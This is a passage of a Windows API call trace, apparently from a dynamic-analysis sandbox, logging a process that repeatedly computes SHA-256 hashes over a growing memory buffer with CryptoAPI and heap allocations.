	[0153.437] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x2308a68, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2308a68, pdwDataLen=0x128aac) returned 1
	[0153.437] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0153.437] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.437] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.438] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.438] CryptHashData (hHash=0x22b68c0, pbData=0x2730580, dwDataLen=0xae0, dwFlags=0x0) returned 1
	[0153.438] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.438] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2308a90
	[0153.438] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2308a90, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2308a90, pdwDataLen=0x128aac) returned 1
	[0153.438] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0153.438] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.438] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.438] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.438] CryptHashData (hHash=0x22b6840, pbData=0x2730580, dwDataLen=0xb00, dwFlags=0x0) returned 1
	[0153.438] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.438] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2308ab8
	[0153.438] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x2308ab8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2308ab8, pdwDataLen=0x128aac) returned 1
	[0153.438] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0153.438] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.438] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.439] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.439] CryptHashData (hHash=0x22b68c0, pbData=0x2730580, dwDataLen=0xb20, dwFlags=0x0) returned 1
	[0153.439] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.439] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2308ae0
	[0153.439] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2308ae0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2308ae0, pdwDataLen=0x128aac) returned 1
	[0153.439] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0153.439] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.439] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.439] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.439] CryptHashData (hHash=0x22b6840, pbData=0x2730580, dwDataLen=0xb40, dwFlags=0x0) returned 1
	[0153.439] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.439] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2308b08
	[0153.439] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x2308b08, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2308b08, pdwDataLen=0x128aac) returned 1
	[0153.439] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0153.439] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.439] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.440] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.440] CryptHashData (hHash=0x22b68c0, pbData=0x2730580, dwDataLen=0xb60, dwFlags=0x0) returned 1
	[0153.440] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.440] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2308b30
	[0153.440] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2308b30, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2308b30, pdwDataLen=0x128aac) returned 1
	[0153.440] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0153.440] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.440] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.440] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.440] CryptHashData (hHash=0x22b6840, pbData=0x2730580, dwDataLen=0xb80, dwFlags=0x0) returned 1
	[0153.440] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.440] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2308b58
	[0153.441] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x2308b58, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2308b58, pdwDataLen=0x128aac) returned 1
	[0153.441] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0153.441] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.441] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.441] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.441] CryptHashData (hHash=0x22b68c0, pbData=0x2730580, dwDataLen=0xba0, dwFlags=0x0) returned 1
	[0153.441] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.441] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2308b80
	[0153.441] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2308b80, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2308b80, pdwDataLen=0x128aac) returned 1
	[0153.441] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0153.441] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.441] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.442] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.442] CryptHashData (hHash=0x22b6840, pbData=0x2730580, dwDataLen=0xbc0, dwFlags=0x0) returned 1
	[0153.442] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.442] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2308ba8
	[0153.442] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x2308ba8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2308ba8, pdwDataLen=0x128aac) returned 1
	[0153.442] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0153.442] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.442] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.442] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.442] CryptHashData (hHash=0x22b68c0, pbData=0x2730580, dwDataLen=0xbe0, dwFlags=0x0) returned 1
	[0153.442] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.442] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2308bd0
	[0153.442] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2308bd0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2308bd0, pdwDataLen=0x128aac) returned 1
	[0153.442] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0153.442] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.442] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.443] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.443] CryptHashData (hHash=0x22b6840, pbData=0x2730580, dwDataLen=0xc00, dwFlags=0x0) returned 1
	[0153.443] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.443] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2308bf8
	[0153.443] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x2308bf8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2308bf8, pdwDataLen=0x128aac) returned 1
	[0153.443] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0153.443] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.443] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.443] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.443] CryptHashData (hHash=0x22b68c0, pbData=0x2730580, dwDataLen=0xc20, dwFlags=0x0) returned 1
	[0153.443] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.443] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2308c20
	[0153.443] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2308c20, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2308c20, pdwDataLen=0x128aac) returned 1
	[0153.443] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0153.443] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.444] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.444] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.444] CryptHashData (hHash=0x22b6840, pbData=0x2730580, dwDataLen=0xc40, dwFlags=0x0) returned 1
	[0153.444] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.444] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2308c48
	[0153.444] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x2308c48, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2308c48, pdwDataLen=0x128aac) returned 1
	[0153.444] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0153.444] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.444] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.444] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.444] CryptHashData (hHash=0x22b68c0, pbData=0x2730580, dwDataLen=0xc60, dwFlags=0x0) returned 1
	[0153.445] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.445] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2308c70
	[0153.445] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2308c70, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2308c70, pdwDataLen=0x128aac) returned 1
	[0153.445] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0153.445] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.445] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.445] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.445] CryptHashData (hHash=0x22b6840, pbData=0x2730580, dwDataLen=0xc80, dwFlags=0x0) returned 1
	[0153.445] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.445] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2308c98
	[0153.445] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x2308c98, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2308c98, pdwDataLen=0x128aac) returned 1
	[0153.445] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0153.445] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.445] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.446] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.446] CryptHashData (hHash=0x22b68c0, pbData=0x2730580, dwDataLen=0xca0, dwFlags=0x0) returned 1
	[0153.446] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.446] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2308cc0
	[0153.446] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2308cc0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2308cc0, pdwDataLen=0x128aac) returned 1
	[0153.446] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0153.446] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.446] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.446] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.446] CryptHashData (hHash=0x22b6840, pbData=0x2730580, dwDataLen=0xcc0, dwFlags=0x0) returned 1
	[0153.446] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.446] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2308ce8
	[0153.446] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x2308ce8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2308ce8, pdwDataLen=0x128aac) returned 1
	[0153.446] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0153.446] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.446] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.447] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.447] CryptHashData (hHash=0x22b68c0, pbData=0x2730580, dwDataLen=0xce0, dwFlags=0x0) returned 1
	[0153.447] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.447] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2308d10
	[0153.447] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2308d10, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2308d10, pdwDataLen=0x128aac) returned 1
	[0153.447] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0153.447] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.447] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.447] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.447] CryptHashData (hHash=0x22b6840, pbData=0x2730580, dwDataLen=0xd00, dwFlags=0x0) returned 1
	[0153.447] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.447] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2308d38
	[0153.447] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x2308d38, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2308d38, pdwDataLen=0x128aac) returned 1
	[0153.447] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0153.447] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.447] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.448] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.448] CryptHashData (hHash=0x22b68c0, pbData=0x2730580, dwDataLen=0xd20, dwFlags=0x0) returned 1
	[0153.448] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.448] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2308d60
	[0153.448] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2308d60, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2308d60, pdwDataLen=0x128aac) returned 1
	[0153.448] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0153.448] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.448] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.448] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.448] CryptHashData (hHash=0x22b6840, pbData=0x2730580, dwDataLen=0xd40, dwFlags=0x0) returned 1
	[0153.448] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.448] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2308d88
	[0153.448] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x2308d88, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2308d88, pdwDataLen=0x128aac) returned 1
	[0153.449] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0153.449] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.449] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.449] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.449] CryptHashData (hHash=0x22b68c0, pbData=0x2730580, dwDataLen=0xd60, dwFlags=0x0) returned 1
	[0153.449] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.449] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2308db0
	[0153.449] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2308db0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2308db0, pdwDataLen=0x128aac) returned 1
	[0153.449] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0153.449] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.449] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.450] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.450] CryptHashData (hHash=0x22b6840, pbData=0x2730580, dwDataLen=0xd80, dwFlags=0x0) returned 1
	[0153.450] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.450] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2308dd8
	[0153.450] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x2308dd8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2308dd8, pdwDataLen=0x128aac) returned 1
	[0153.450] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0153.450] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.450] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.450] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.450] CryptHashData (hHash=0x22b68c0, pbData=0x2730580, dwDataLen=0xda0, dwFlags=0x0) returned 1
	[0153.450] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.450] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2308e00
	[0153.450] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2308e00, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2308e00, pdwDataLen=0x128aac) returned 1
	[0153.450] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0153.450] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.450] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.451] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.451] CryptHashData (hHash=0x22b6840, pbData=0x2730580, dwDataLen=0xdc0, dwFlags=0x0) returned 1
	[0153.451] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.451] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2308e28
	[0153.451] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x2308e28, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2308e28, pdwDataLen=0x128aac) returned 1
	[0153.451] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0153.451] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.451] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.451] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.451] CryptHashData (hHash=0x22b68c0, pbData=0x2730580, dwDataLen=0xde0, dwFlags=0x0) returned 1
	[0153.451] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.451] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2308e50
	[0153.451] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2308e50, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2308e50, pdwDataLen=0x128aac) returned 1
	[0153.451] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0153.451] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
